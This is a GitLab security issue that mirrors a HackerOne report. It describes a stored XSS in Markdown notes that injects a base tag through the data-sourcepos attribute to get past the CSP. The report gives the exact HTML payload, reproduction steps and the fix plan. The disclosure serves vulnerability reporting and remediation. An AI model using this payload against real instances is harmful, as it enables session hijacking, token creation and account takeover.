Skip to content

Stored XSS in Notes (with CSP bypass for gitlab.com)

HackerOne report #1481207 by joaxcar on 2022-02-14, assigned to @ngeorge1:

Report | Attachments | How To Reproduce

Report

Summary

I read the issue 345657 which handles the XSS in notes reported in Hackerone report 1398305. This issue fixes the reported XSS but leaves the HTML injection that was also mentioned. I don't know how you deal with these situations, but I thought I report this, and you can decide :)

The issue linked above shows how a user can inject HTML in any Note (actually any Markdown it seems. For example wiki pages and issue descriptions) by abusing syntax_highlight_filter.rb.

There are more ways to take this injection and weaponize it than the patched Emoji tag. I have a list of additional vectors but though that I would report the worst one (proper full stored XSS) and explain more if you decide to accept the report. To not waste our time.

I have multiple ways to inject script tags, but it looks like you have hardened your CSP? None of the old bypasses worked for me. But it still seems that you have not blocked the base tag. And fortunately for me, the injection let me pass in base tags. So by entering this into an issue description or wiki page

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre>  
<base href=https://joaxcar.com>  
<pre x=&#34;">  
<code></code></pre>

All relative links in the page will try to load their data from my site "joaxar.com". If we then open DevTools and reload the page, we will see the name of all files that failed to load. In the case of an issue page, we have this script

http://joaxcar.com/assets/webpack/hello.4948f350.chunk.js

and for a wiki page we have

https://joaxcar.com/assets/webpack/top_nav.c9763726.chunk.js

after.png

Now I just have to create these files on my domain, and they will load and bypass CSP (as these script tags will have nonce in place and can thus load anything)

payload.jpg

Steps to reproduce

  1. log in as a user on Gitlab.com
  2. go to any project (or create one), and add a new issue
  3. enter this as the description (replace with your own server if you need to generate new scripts on your own domain)
<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre>  
<base href=https://joaxcar.com>  
<pre x=&#34;">  
<code></code></pre>
  1. save the issue
  2. open DevTools (f12) and look for failing script imports
  3. create the missing script on your domain containing
alert(document.domain)
  1. reload the page and the popup should pop

xssbase.jpg

Impact

Stored XSS in gitlab.com

There are more that can be added to the report but I am sending this in first and will add information later. The XSS can as you know create tokens (and as I have shown before take over SSO accounts)

What is the current bug behavior?

HTML injection in Markdown

What is the expected correct behavior?

Should not be possible

Output of checks

This bug happens on GitLab.com

Impact

Stored XSS in gitlab.com

There are more that can be added to the report but I am sending this in first and will add information later. The XSS can as you know create tokens (and as I have shown before take over SSO accounts)

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Implementation Plan

Issue Description Department
# Add strict validation allowing only number range for data-sourcepos attribute backend
# Escape user input when generating highlight html backend
#241857 (closed) Add v-safe-html for rendering markdown frontend
# Avoid generating html strings in gl_field_error.js frontend
#338075 (closed) Add base-uri directive in the CSP of GitLab.com security
Edited by Dheeraj Joshi